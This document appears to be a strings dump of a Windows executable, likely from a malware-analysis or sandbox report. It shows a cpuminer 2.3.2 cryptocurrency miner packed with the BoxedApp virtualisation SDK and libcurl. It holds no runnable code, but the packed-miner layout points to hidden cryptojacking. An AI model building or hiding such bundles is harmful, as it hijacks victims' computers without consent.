create failed</pre><pre>%d miner threads started, using '%s' algorithm.</pre><pre>cert</pre><pre>userpass</pre><pre>-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)</pre><pre>-O, --userpass=U:P username:password pair for mining server</pre><pre>-p, --pass=PASSWORD password for mining server</pre><pre>--cert=FILE certificate for mining server using SSL</pre><pre>-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy</pre><pre>--no-longpoll disable X-Long-Polling support</pre><pre>--no-stratum disable X-Stratum support</pre><pre>[%d-d-d d:d:d] %s</pre><pre>User-Agent: cpuminer/2.3.2</pre><pre>HTTP request failed: %s</pre><pre>JSON-RPC call failed: %s</pre><pre>hex2bin failed on '%s'</pre><pre>DEBUG: %s</pre><pre>Hash: %s</pre><pre>Target: %s</pre><pre>http%s</pre><pre>http_proxy</pre><pre>Stratum connection failed: %s</pre><pre>{"id": 1, "method": "mining.subscribe", "params": []}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}</pre><pre>mining.notify</pre><pre>Stratum session id: %s</pre><pre>mining.set_difficulty</pre><pre>client.reconnect</pre><pre>stratum tcp://%s:%d</pre><pre>Server requested reconnection to %s</pre><pre>client.get_version</pre><pre>cpuminer/2.3.2</pre><pre>client.show_message</pre><pre>MESSAGE FROM SERVER: %s</pre><pre>{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}</pre><pre>%s near '%s'</pre><pre>%s near end of file</pre><pre>unable to decode byte 0x%x at position %d</pre><pre>control character 0x%x</pre><pre>invalid Unicode '\uX\uX'</pre><pre>invalid Unicode '\uX'</pre><pre>end == saved_text lex->saved_text.length</pre><pre>unable to open %s: %s</pre><pre>\ux</pre><pre>\ux\ux</pre><pre>mingwm10.dll</pre><pre>__mingwthr_remove_key_dtor</pre><pre>__mingwthr_key_dtor</pre><pre>VirtualQuery failed for %d bytes at address %p</pre><pre>Unknown pseudo relocation protocol version %d.</pre><pre>Unknown pseudo relocation bit size %d.</pre><pre>%s: option requires an argument -- %c</pre><pre>%s: unrecognised option `-%s'</pre><pre>%s: invalid option -- %c</pre><pre>option `%s%s' doesn't accept an argument</pre><pre>option `%s%s' requires an argument</pre><pre>%s: option `%s' is ambiguous</pre><pre>%s: unrecognised option `%s'</pre><pre>0123456789</pre><pre>1399780752 312</pre><pre>curl_easy_cleanup</pre><pre>curl_easy_init</pre><pre>curl_easy_perform</pre><pre>curl_easy_reset</pre><pre>curl_easy_setopt</pre><pre>curl_global_init</pre><pre>curl_slist_append</pre><pre>curl_slist_free_all</pre><pre>curl_version</pre><pre>pthread_join</pre><pre>libcurl-4.dll</pre><pre>KERNEL32.dll</pre><pre>msvcrt.dll</pre><pre>pthreadGC2.dll</pre><pre>WS2_32.dll</pre><pre>zcÁ</pre><pre>KERNEL32.DLL</pre><pre>USER32.DLL</pre><pre>EnumChildWindows</pre><pre>kernel32.dll</pre><pre>ntdll.dll</pre><pre>mscoree.dll</pre><pre>.mixcrt</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>USER32.dll</pre><pre>SHELL32.dll</pre><pre>OLEAUT32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>EXEPackerHost32.exe</pre><pre>?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>.\BoxedAppSDK_StaticLib.cpp</pre><pre>BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>BoxedAppSDK_EnumVirtualRegKeysA</pre><pre>BoxedAppSDK_EnumVirtualRegKeysW</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationA</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyByHandle</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyA</pre><pre>BoxedAppSDK_CreateVirtualRegKeyW</pre><pre>BoxedAppSDK_CreateVirtualRegKeyA</pre><pre>C62E2B35-E4B3-4019-A7C4-F50AC7F78470</pre><pre>Get exe dir...</pre><pre>Get exe dir...done</pre><pre>Get the extension...done</pre><pre>Get current dir...done</pre><pre>Get old args...done</pre><pre>The command line overriding: %s</pre><pre>GetCommandLineW preparing to intercept...done</pre><pre>GetCommandLineA preparing to intercept...done</pre><pre>The embedding BoxedApp into child processes: %s</pre><pre>GetWindowsDirectoryW</pre><pre>RegCreateKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>EXEPackerStub32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb</pre><pre>l$D9.tO</pre><pre>FTPSW</pre><pre>uÂ$D</pre><pre><p></p><pre>TryCreateProcessForVirtualEXE, template exe found:</pre><pre>CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtQueryKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x</pre><pre>KernelBase.dll</pre><pre>0x%x%x</pre><pre>CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '</pre><pre>CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '</pre><pre>CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRenameKey, KeyHandle =</pre><pre>BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart</pre><pre>: Can't create process of rundll32.exe, last error =</pre><pre>{4F95F74C-9713-4181-ACDD-8A50195FBC0F}</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper</pre><pre>CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x</pre><pre>:\VirtualDllWithSameImport.dll</pre><pre>:\VirtualDllWithTls.dll</pre><pre>VirtualDllWithTls.dll</pre><pre>VirtualDllWithSameImport.dll</pre><pre>WinExec</pre><pre>advapi32.dll</pre><pre>NtRenameKey</pre><pre>NtUnloadKey</pre><pre>NtSetValueKey</pre><pre>NtSetInformationKey</pre><pre>NtSaveKey</pre><pre>NtRestoreKey</pre><pre>NtReplaceKey</pre><pre>NtQueryValueKey</pre><pre>NtQueryMultipleValueKey</pre><pre>NtQueryKey</pre><pre>NtOpenKeyEx</pre><pre>NtOpenKey</pre><pre>NtNotifyChangeKey</pre><pre>NtLoadKey2</pre><pre>NtLoadKey</pre><pre>NtFlushKey</pre><pre>NtEnumerateValueKey</pre><pre>NtEnumerateKey</pre><pre>NtDeleteValueKey</pre><pre>NtDeleteKey</pre><pre>NtCreateKey</pre><pre>[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]</pre><pre>FILE_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>KEY_WOW64_64KEY</pre><pre>KEY_WOW64_32KEY</pre><pre>KEY_NOTIFY</pre><pre>KEY_CREATE_LINK</pre><pre>KEY_ENUMERATE_SUB_KEYS</pre><pre>KEY_CREATE_SUB_KEY</pre><pre>KEY_SET_VALUE</pre><pre>KEY_QUERY_VALUE</pre><pre>SECTION_MAP_EXECUTE</pre><pre>PAGE_EXECUTE_WRITECOPY</pre><pre>PAGE_EXECUTE_READWRITE</pre><pre>PAGE_EXECUTE_READ</pre><pre>PAGE_EXECUTE</pre><pre>STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED</pre><pre>STATUS_LOCAL_USER_SESSION_KEY</pre><pre>STATUS_NULL_LM_PASSWORD</pre><pre>STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE</pre><pre>STATUS_CARDBUS_NOT_SUPPORTED</pre><pre>STATUS_INVALID_PORT_ATTRIBUTES</pre><pre>STATUS_PORT_MESSAGE_TOO_LONG</pre><pre>STATUS_PORT_DISCONNECTED</pre><pre>STATUS_PORT_CONNECTION_REFUSED</pre><pre>STATUS_INVALID_PORT_HANDLE</pre><pre>STATUS_PORT_ALREADY_SET</pre><pre>STATUS_EAS_NOT_SUPPORTED</pre><pre>STATUS_CTL_FILE_NOT_SUPPORTED</pre><pre>STATUS_WRONG_PASSWORD</pre><pre>STATUS_ILL_FORMED_PASSWORD</pre><pre>STATUS_PASSWORD_RESTRICTION</pre><pre>STATUS_PASSWORD_EXPIRED</pre><pre>STATUS_FLOAT_DENORMAL_OPERAND</pre><pre>STATUS_FLOAT_INVALID_OPERATION</pre><pre>STATUS_PIPE_NOT_AVAILABLE</pre><pre>STATUS_INVALID_PIPE_STATE</pre><pre>STATUS_PIPE_BUSY</pre><pre>STATUS_PIPE_DISCONNECTED</pre><pre>STATUS_PIPE_CLOSING</pre><pre>STATUS_PIPE_CONNECTED</pre><pre>STATUS_PIPE_LISTENING</pre><pre>STATUS_NOT_SUPPORTED</pre><pre>STATUS_PIPE_EMPTY</pre><pre>STATUS_WRONG_PASSWORD_CORE</pre><pre>STATUS_PIPE_BROKEN</pre><pre>STATUS_DISK_OPERATION_FAILED</pre><pre>STATUS_KEY_DELETED</pre><pre>STATUS_KEY_HAS_CHILDREN</pre><pre>STATUS_NO_USER_SESSION_KEY</pre><pre>STATUS_PASSWORD_MUST_CHANGE</pre><pre>STATUS_PORT_UNREACHABLE</pre><pre>STATUS_LOGIN_TIME_RESTRICTION</pre><pre>STATUS_LOGIN_WKSTA_RESTRICTION</pre><pre>STATUS_UNSUPPORTED_COMPRESSION</pre><pre>STATUS_NO_USER_KEYS</pre><pre>STATUS_NOT_EXPORT_FORMAT</pre><pre>STATUS_TRANSPORT_FULL</pre><pre>STATUS_WMI_NOT_SUPPORTED</pre><pre>STATUS_SAM_NEED_BOOTKEY_PASSWORD</pre><pre>STATUS_SAM_NEED_BOOTKEY_FLOPPY</pre><pre>STATUS_STRONG_CRYPTO_NOT_SUPPORTED</pre><pre>STATUS_NOT_SUPPORTED_ON_SBS</pre><pre>STATUS_CSS_KEY_NOT_PRESENT</pre><pre>STATUS_CSS_KEY_NOT_ESTABLISHED</pre><pre>STATUS_NO_KERB_KEY</pre><pre>STATUS_UNSUPPORTED_PREAUTH</pre><pre>STATUS_PORT_NOT_SET</pre><pre>STATUS_INVALID_IMPORT_OF_NON_DLL</pre><pre>STATUS_SMARTCARD_NO_KEY_CONTAINER</pre><pre>STATUS_SMARTCARD_NO_CERTIFICATE</pre><pre>STATUS_SMARTCARD_NO_KEYSET</pre><pre>STATUS_SMARTCARD_CERT_REVOKED</pre><pre>STATUS_SMARTCARD_CERT_EXPIRED</pre><pre>STATUS_SXS_KEY_NOT_FOUND</pre><pre>STATUS_CLUSTER_JOIN_IN_PROGRESS</pre><pre>STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS</pre><pre>RegDeleteKeyExW</pre><pre>NtRequestWaitReplyPort</pre><pre>NtConnectPort</pre><pre>NtReplyPort</pre><pre>NtCompleteConnectPort</pre><pre>NtAcceptConnectPort</pre><pre>NtReplyWaitReceivePort</pre><pre>NtCreateWaitablePort</pre><pre>Imported function,</pre><pre>.data</pre><pre>It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL</pre><pre>It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream</pre><pre>It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys</pre><pre>NtEnumerateKey() returned unexpected error, status =</pre><pre>, RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys</pre><pre>, RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>: RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>: GetAllChildsKeys() failed, status =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal</pre><pre>: RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath</pre><pre>error, IVirtualKeyHandle_GetFullPath() returned</pre><pre>Invalid key information class:</pre><pre>KeySetHandleTagsInformation is not supported for virtual handle</pre><pre>KeySetDebugInformation is not supported for virtual handle</pre><pre>KeySetVirtualizationInformation is not supported for virtual handle</pre><pre>KeyControlFlagsInformation is not supported for virtual handle</pre><pre>KeyWow64FlagsInformation is not supported for virtual handle</pre><pre>We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles</pre><pre>We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles</pre><pre>: IVirtualKeyHandle::Rename() failed, hr =</pre><pre>: RegTree::IKeyNode::Remove() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal</pre><pre>: RegTree::IKeyNode::AddKey() failed, hr =</pre><pre>: result hkey =</pre><pre>: IVirtualKey::CreateKey() failed, hr =</pre><pre>: we can't create a virtual key with its own behavior under another virtual key</pre><pre>: Handles::CreateVirtualKeyHandle() failed, hr =</pre><pre>: IVirtualKey::OpenKey() failed, hr =</pre><pre>: RegImpl::CreateKeyOnSharedMem() failed, hr =</pre><pre>: GetFullRegKeyPath() failed for the hKey =</pre><pre>: Handles::IVirtualKeyHandle::CreateKey() failed and returned</pre><pre>: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey</pre><pre>: lpSubKey: "</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey</pre><pre>: Handles::CreateVirtualKeyHandle() failed</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal</pre><pre>: SearchStartingFromRealKey() failed</pre><pre>: RegTree::IKeyNode::FindValue() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal</pre><pre>: IVirtualKeyHandle::put_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime</pre><pre>: NtQueryKey() failed, status =</pre><pre>: NtOpenKey() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys</pre><pre>: NtEnumerateValueKey() failed when we tried to get name of the node, status =</pre><pre>: IKeyNode::EnumValues() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal</pre><pre>: invalid KeyInformationClass passed:</pre><pre>: IVirtualKeyHandle_GetFullPath() failed, hr =</pre><pre>: Behavior::IEnumVirtualKey::GetNext() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: IVirtualKeyHandle::get_LastWriteTime() failed, hr =</pre><pre>reg:NtQueryMultipleValueKey(</pre><pre>: IKeyNode::FindValue() failed, hr =</pre><pre>: IVirtualKeyHandle::get_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal</pre><pre>: IVirtualKeyHandle::get_ValueType() failed, hr =</pre><pre>reg:NtSetInformationKey(</pre><pre>RegTree::IKeyNode::RemoveValue() failed, hr</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal</pre><pre>reg:NtRenameKey(</pre><pre>RegTree::IEnumKeyNode::GetNext(), hr =</pre><pre>RegTree::IKeyNode::EnumKeys(), hr =</pre><pre>: IEnumVirtualKey::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal</pre><pre>reg:NtDeleteValueKey(</pre><pre>: NtEnumerateKey() failed when we tried to get name of the node, status =</pre><pre>, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =</pre><pre>, Behavior::IVirtualKey::OpenKey() failed, hr =</pre><pre>: IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal</pre><pre>reg:NtEnumerateValueKey(</pre><pre>reg:NtQueryKey(</pre><pre>reg:NtQueryValueKey(</pre><pre>reg:NtSetValueKey(</pre><pre>reg:NtCreateKey(</pre><pre>reg:NtDeleteKey(</pre><pre>reg:NtEnumerateKey(</pre><pre>reg:NtOpenKey(</pre><pre>RegOpenKeyExW</pre><pre>RegOpenKeyW</pre><pre>bxsdk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb</pre><pre>`.rsrc</pre><pre>v2.0.50727</pre><pre>BoxedAppSDK_AppDomainManager.dll</pre><pre>System.Security</pre><pre>.ctor</pre><pre>System.Security.Policy</pre><pre>System.Reflection</pre><pre>System.Runtime.InteropServices</pre><pre>System.Diagnostics</pre><pre>System.Runtime.CompilerServices</pre><pre>System.Collections</pre><pre>System.Security.Permissions</pre><pre>System.IO</pre><pre>DllImportAttribute</pre><pre>shell32.dll</pre><pre>lpCmdLine</pre><pre>1.0.0.0</pre><pre>$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78</pre><pre>D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb</pre><pre>BoxedAppSDKThunk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb</pre><pre>.reloc</pre><pre>TLSSupport32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb</pre><pre>9 9$9(9,909</pre><pre>4!40484}4</pre><pre>:$:,:5:::{:</pre><pre>?#?2?9?@?</pre><pre>1 1$1(1,1014181</pre><pre>9$=(=,=0=4=8=<=@=</pre><pre>6 6$6(6,6064686<6@6</pre><pre>1"26233'4</pre><pre>4 40454:4</pre><pre>:":2:7:>;</pre><pre>,1014181</pre><pre>8 8$8(8,8</pre><pre>P`.data</pre><pre>.edata</pre><pre>0@.idata</pre><pre>SShPi</pre><pre>SSh}i</pre><pre>purl/</pre><pre>j.RPj</pre><pre>libgcj_s.dll</pre><pre>Couldn't open file %s</pre><pre>Can't open %s for writing</pre><pre>Can't get the size of %s</pre><pre>Last-Modified: %s, d %s M d:d:d GMT</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>%c%c%c%c</pre><pre>%s:%d</pre><pre>%5[^:]:%d:%5s</pre><pre>Resolve %s found illegal!</pre><pre>Added %s:%d:%s to DNS cache</pre><pre>timeout on name lookup is not supported</pre><pre>%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s</pre><pre>; filename="%s"</pre><pre>%s; boundary=%s</pre><pre>Content-Type: multipart/mixed, boundary=%s</pre><pre>Content-Type: %s</pre><pre>couldn't open file "%s"</pre><pre>--%s--</pre><pre>p.jpg</pre><pre>p.jpeg</pre><pre>p.txt</pre><pre>p.html</pre><pre>p.xml</pre><pre>#HttpOnly_</pre><pre>23[^;</pre><pre>=]=I99[^;</pre><pre>httponly</pre><pre>skipped cookie with illegal dotcount domain: %s</pre><pre>skipped cookie with bad tailmatch domain: %s</pre><pre>%s cookie %s="%s" for domain %s, path %s, expire %lld</pre><pre># Netscape HTTP Cookie File</pre><pre># http://curl.haxx.se/docs/http-cookies.html</pre><pre># This file was generated by libcurl! Edit at your own risk.</pre><pre># Fatal libcurl error</pre><pre>WARNING: failed to save cookies in %s</pre><pre>Avoided giant realloc for header (max is %d)!</pre><pre>HTTP/</pre><pre>The requested URL returned error: %d</pre><pre>%s, d %s M d:d:d GMT</pre><pre>If-Modified-Since: %s</pre><pre>If-Unmodified-Since: %s</pre><pre>Last-Modified: %s</pre><pre>%sAuthorization: Basic %s</pre><pre>%s auth using %s with user '%s'</pre><pre>Referer: %s</pre><pre>Accept-Encoding: %s</pre><pre>%s, TE</pre><pre>Chunky upload is not supported by HTTP 1.0</pre><pre>Host: %s%s%s</pre><pre>Host: %s%s%s:%hu</pre><pre>ftp://</pre><pre>;type=%c</pre><pre>Range: bytes=%s</pre><pre>Content-Range: bytes %s%lld/%lld</pre><pre>Content-Range: bytes %s/%lld</pre><pre>ftp://%s:%s@%s</pre><pre>%s HTTP/%s</pre><pre>%s%s%s%s%s%s%s%s%s%s%s</pre><pre>%s%s=%s</pre><pre>Internal HTTP POST error!</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>Failed sending HTTP POST request</pre><pre>Failed sending HTTP request</pre><pre>HTTP error before end of send, stop sending</pre><pre>HTTP/%d.%d =</pre><pre>HTTP =</pre><pre>RTSP/%d.%d =</pre><pre>The requested URL returned error: %s</pre><pre>HTTP 1.0, assume close after body</pre><pre>HTTP/1.0 proxy connection set to keep alive!</pre><pre>HTTP/1.1 proxy connection set close!</pre><pre>HTTP/1.0 connection set to keep alive!</pre><pre>[%s %s %s]</pre><pre>Recv failure: %s</pre><pre>Send failure: %s</pre><pre>/etc/ssl/certs/ca-certificates.crt</pre><pre>IDN support not present, can't parse Unicode domains</pre><pre>Connected to %s (%s) port %ld (#%ld)</pre><pre>%5[^:@]:%5[^@]</pre><pre>[%*45[0123456789abcdefABCDEF:.]%c</pre><pre>%s://%s%s%s:%hu%s%s%s</pre><pre>Port number too large: %lu</pre><pre>Couldn't resolve host '%s'</pre><pre>Couldn't resolve proxy '%s'</pre><pre>User-Agent: %s</pre><pre>About to connect() to %s%s port %ld (#%ld)</pre><pre>Curl_addHandleToPipeline: length: %d</pre><pre>Closing connection %d</pre><pre>Connection #%ld to host %s left intact</pre><pre>Found bundle for host %s: %p</pre><pre>Server doesn't support pipelining</pre><pre>Connection %d seems to be dead!</pre><pre>[^:]:%[^</pre><pre>:]://%[^</pre><pre><url> malformed</url></pre><pre>:%5[^@]</pre><pre>Protocol %s not supported or disabled in libcurl</pre><pre>%s://%s</pre><pre>Couldn't find host %s in the _netrc file; using defaults</pre><pre>ftp@example.com</pre><pre>Found connection %d, with requests in the pipe (%d)</pre><pre>Re-using existing connection! (#%ld) with host %s</pre><pre>CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!</pre><pre>Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds</pre><pre>zlib/%s</pre><pre>7.30.0</pre><pre>%%X</pre><pre>login</pre><pre>password</pre><pre>[^?&/:]://%c</pre><pre>Issue another request to this URL: '%s'</pre><pre>Violate RFC 2616/10.3.2 and switch from POST to GET</pre><pre>Violate RFC 2616/10.3.3 and switch from POST to GET</pre><pre>Disables POST, goes with %s</pre><pre>No URL set!</pre><pre>seek callback returned error %d</pre><pre>the ioctl callback returned %d</pre><pre>ioctl callback returned error %d</pre><pre>operation aborted by callback</pre><pre>Rewinding stream by : %zd bytes on url %s (zero-length body)</pre><pre>Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)</pre><pre>HTTP server doesn't seem to support byte ranges. Cannot resume.</pre><pre>Problem (%d) in the Chunked-Encoded data</pre><pre>Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)</pre><pre>Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld</pre><pre>Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.</pre><pre>Operation timed out after %ld milliseconds with %lld out of %lld bytes received</pre><pre>Operation timed out after %ld milliseconds with %lld bytes received</pre><pre>pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.</pre><pre>psa_addr inet_ntop() failed with errno %d: %s</pre><pre>Trying %s...</pre><pre>Could not set TCP_NODELAY: %s</pre><pre>TCP_NODELAY set</pre><pre>Failed to set SO_KEEPALIVE on fd %d</pre><pre>Failed to set SIO_KEEPALIVE_VALS on fd %d: %d</pre><pre>Couldn't bind to interface '%s'</pre><pre>Local Interface %s is ip %s using address family %i</pre><pre>Name '%s' family %i resolved to '%s' family %i</pre><pre>Couldn't bind to '%s'</pre><pre>getsockname() failed with errno %d: %s</pre><pre>Local port: %hu</pre><pre>Bind to local port %hu failed, trying next</pre><pre>bind failed with errno %d: %s</pre><pre>Failed to connect to %s: %s</pre><pre>couldn't connect to %s at %s:%d</pre><pre>getpeername() failed with errno %d: %s</pre><pre>ssrem inet_ntop() failed with errno %d: %s</pre><pre>ssloc inet_ntop() failed with errno %d: %s</pre><pre>Failed connect to %s:%ld; %s</pre><pre>pInternal error clearing splay node = %d</pre><pre>Internal error removing splay node = %d</pre><pre>pPipe broke: handle 0x%p, url = %s</pre><pre>In state %d with no easy_conn, bail out!</pre><pre>Error while processing content unencoding: %s</pre><pre>1.2.8</pre><pre>1.2.0.4</pre><pre>px</pre><pre>%s:%s:%s</pre><pre>%s:%.*s</pre><pre>%s:%s:x:%s:%s:%s</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"</pre><pre>%s, opaque="%s"</pre><pre>%s, algorithm="%s"</pre><pre>Unsupported protocol</pre><pre>URL using bad/illegal format or missing URL</pre><pre>A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.</pre><pre>FTP: weird server reply</pre><pre>FTP: The server failed to connect to data port</pre><pre>FTP: Accepting server connect has timed out</pre><pre>FTP: The server did not accept the PRET command.</pre><pre>FTP: unknown PASS reply</pre><pre>FTP: unknown PASV reply</pre><pre>FTP: unknown 227 response format</pre><pre>FTP: can't figure out the host in the PASV response</pre><pre>FTP: couldn't set file type</pre><pre>FTP: couldn't retrieve (RETR failed) the specified file</pre><pre>HTTP response code said error</pre><pre>FTP: command PORT failed</pre><pre>FTP: command REST failed</pre><pre>Operation was aborted by an application callback</pre><pre>A libcurl function was given a bad argument</pre><pre>An unknown option was passed in to libcurl</pre><pre>SSL peer certificate or SSH remote key was not OK</pre><pre>Problem with the local SSL certificate</pre><pre>Peer certificate cannot be authenticated with given CA certificates</pre><pre>Problem with the SSL CA cert (path? access rights?)</pre><pre>Unrecognized or bad HTTP Content or Transfer-Encoding</pre><pre>Invalid LDAP URL</pre><pre>Issuer check against peer certificate failed</pre><pre>Login denied</pre><pre>TFTP: File Not Found</pre><pre>TFTP: Access Violation</pre><pre>TFTP: Illegal operation</pre><pre>TFTP: Unknown transfer ID</pre><pre>TFTP: No such user</pre><pre>Caller must register CURLOPT_CONV_ callback options</pre><pre>Error in the SSH layer</pre><pre>Unable to parse FTP file list</pre><pre>Please call curl_multi_perform() soon</pre><pre>CURLSHcode unknown</pre><pre>Protocol option is unsupported</pre><pre>Protocol is unsupported</pre><pre>Socket is unsupported</pre><pre>Operation not supported</pre><pre>Address family not supported</pre><pre>Protocol family not supported</pre><pre>Winsock version not supported</pre><pre>Unknown error %d (%#x)</pre><pre>Curl_ipv4_resolve_r failed for %s</pre><pre>%d.%d.%d.%d</pre><pre>d:d:d</pre><pre>d:d</pre><pre>User was rejected by the SOCKS5 server (%d %d).</pre><pre>SOCKS5 GSSAPI per-message authentication is not supported.</pre><pre>No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)</pre><pre>Failed to resolve "%s" for SOCKS5 connect.</pre><pre>Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to %s:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)</pre><pre>Failed to resolve "%s" for SOCKS4 connect.</pre><pre>SOCKS4%s request granted.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.</pre><pre>Establish HTTP proxy tunnel to %s:%hu</pre><pre>%s:%hu</pre><pre>%s%s%s:%hu</pre><pre>Host: %s</pre><pre>CONNECT %s HTTP/%s</pre><pre>%s%s%s%s</pre><pre>HTTP/1.%d 